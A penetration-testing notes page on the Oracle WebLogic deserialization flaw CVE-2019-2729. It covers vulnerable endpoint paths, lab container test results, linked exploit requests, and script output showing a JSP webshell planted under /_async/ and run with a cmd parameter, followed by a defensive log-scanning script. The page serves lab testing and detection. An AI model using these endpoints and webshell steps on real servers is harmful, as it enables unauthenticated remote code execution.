# WebLogic - CVE-2019-2729

Oracle WebLogic Server is affected by a **remote code execution** vulnerability in the `wls-wsat.war` and `wls9_async_response.war` packages, caused by unsafe deserialization of Java objects. A remote **unauthenticated** attacker can exploit the issue by sending a crafted serialized Java object in an HTTP request, executing arbitrary Java code in the context of the web server.

Exploiting `wls-wsat.war` returns the command output in the response, while `wls9_async_response.war` is blind (nothing is returned).

Affected versions: **10.3.6.0.0**, **12.1.3.0.0** and **12.2.1.3.0**

### Vulnerable endpoints

```bash
## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
/_async/AsyncResponseService
```

### Test data

| Version | Image | Result | Reason |
|---|---|---|---|
| 10.3.6.0 | [VulnHub 10.3.6.0-2017](https://hub.docker.com/layers/vulhub/weblogic/10.3.6.0-2017/images/sha256-275ec19477cfda389dc1c42158033e7e8c650dd4cba9f090ca0ba673902b73c9?context=explore) | Vulnerable | wls-wsat deserialization |
| 12.2.1.3 | [VulnHub 12.2.1.3-2018](https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3-2018/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore) | Not vulnerable | Endpoints missing |
| 12.2.1.3 | [VulnHub 12.2.1.3](https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore) | Not vulnerable | Endpoints missing |
| 12.2.1.3 | [weblogic:12.2.1.3](https://container-registry.oracle.com/ords/f?p=113:4:100763132084359:::4:P4_REPOSITORY,AI_REPOSITORY,AI_REPOSITORY_NAME,P4_REPOSITORY_NAME,P4_EULA_ID,P4_BUSINESS_AREA_ID:5,5,Oracle%20WebLogic%20Server,Oracle%20WebLogic%20Server,1,0&cs=3KTZ9kW4gHaVNXvYp_seg3AmnCL3G7pI4VfyLUNKH2oNI2LPL15b5PgGNbUGWjuU0cZz_Tul__-raSj8DmP2tQQ) | Inconclusive | *"Old format work area header is disabled."* |

[Request 01](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req01.txt), RCE on version 10.3.6.0:

<figure><img src="/files/z3LUwqNOzSjshTLM4Yqm" alt=""><figcaption></figcaption></figure>

[Request 02](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req02.txt), designed for version 10.2.7.1, RCE on 10.3.6.0:

<figure><img src="/files/gpzlETHdSFXeBzG0Rnjx" alt=""><figcaption></figcaption></figure>

[Request 03](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req03.txt), designed for version 10.3.6.0, RCE on 10.3.6.0:

<figure><img src="/files/mtFW3WnYhLuy03GceAIe" alt=""><figcaption></figcaption></figure>

[Request 04](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req04.txt), designed for version 10.3.6.2, RCE on 10.3.6.0:

<figure><img src="/files/ePz1UDZJ7v31FvPrfhPP" alt=""><figcaption></figcaption></figure>

[Request 05](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req05.txt), designed for version 12.2.1.3, returns the error "Old format work area header is disabled." on version 12.2.1.3. Not sure whether this error is caused by my container; more test data is needed.

<figure><img src="/files/tbHf1zag21kLeCmK9Y78" alt=""><figcaption></figcaption></figure>

### Scripts

[`weblogic_get_webshell.py`](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/weblogic_get_webshell/weblogic_get_webshell.py) - runs three payloads against the target in one go; written by [rootedshell](https://github.com/rootedshell/Weblogic/tree/master).

```bash
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root
```

As there are few public exploits using the `/_async/` endpoint, I've modified *rootedshell's* script to only upload a webshell and allow direct command execution. The script can be found [here](https://github.com/0xPThree/WebLogic/tree/main/cve-2019-2725/weblogic_webshell).

<figure><img src="/files/q9cCEBh7a39iFt2VHN9i" alt=""><figcaption></figcaption></figure>
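Defensive counterpart to the two paths described above, as an added example that is not part of the original page or of rootedshell's script: it scans access-log lines in Common Log Format (the layout is an assumption; adjust the regex for extended formats) and flags POSTs to the endpoints listed under Vulnerable endpoints, plus any JSP served from `/_async/`, which is the follow-on indicator of the blind path seen in the script output above. The sample log lines are constructed.

```python
import re
from typing import List, Optional, Tuple

# Endpoints listed on this page: wls-wsat.war (returns output) and wls9_async_response.war (blind).
WLS_WSAT = {
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType", "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11", "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11", "/wls-wsat/RegistrationRequesterPortType11",
}
ASYNC = "/_async/AsyncResponseService"

# Common Log Format: host ident user [time] "request" status bytes (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
Finding = Tuple[str, str, str]  # (client host, rule name, requested path)

def classify(line: str) -> Optional[Finding]:
    m = LOG_RE.match(line)
    if not m:
        return None
    host, method, path = m["host"], m["method"], m["path"]
    route = path.split("?", 1)[0]
    # Rule 1: POST to a deserialization entry point. The exploit is a SOAP POST;
    # a GET for the WSDL does not match, so ordinary WSDL lookups stay quiet.
    if method == "POST" and (route in WLS_WSAT or route == ASYNC):
        flavour = "wls-wsat" if route.startswith("/wls-wsat/") else "_async, blind"
        return (host, f"POST to deserialization endpoint ({flavour})", path)
    # Rule 2: a JSP served from /_async/. The blind endpoint returns no output, so the
    # follow-on step shown on this page is a dropped webshell called with ?cmd=.
    if route.startswith("/_async/") and route.lower().endswith(".jsp"):
        return (host, "JSP served under /_async/ (possible webshell)", path)
    return None

def scan(lines: List[str]) -> List[Finding]:
    return [f for f in map(classify, lines) if f is not None]

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2019:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4521',
    '10.0.0.7 - - [01/May/2019:10:00:02 +0000] "GET /_async/AsyncResponseService?WSDL HTTP/1.1" 200 3301',
    '10.0.0.9 - - [01/May/2019:10:00:03 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1190',
    '10.0.0.9 - - [01/May/2019:10:00:04 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
    '10.0.0.9 - - [01/May/2019:10:00:05 +0000] "GET /_async/.s8Jn4WlqX2c592.jsp?cmd=whoami HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for host, rule, path in scan(SAMPLE_LOG):
        print(f"{host}  {rule}: {path}")
```

A single host hitting rule 1 on the blind endpoint and then rule 2 within seconds is the sequence the webshell script above produces; correlating on the client host turns the two hits into one incident.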
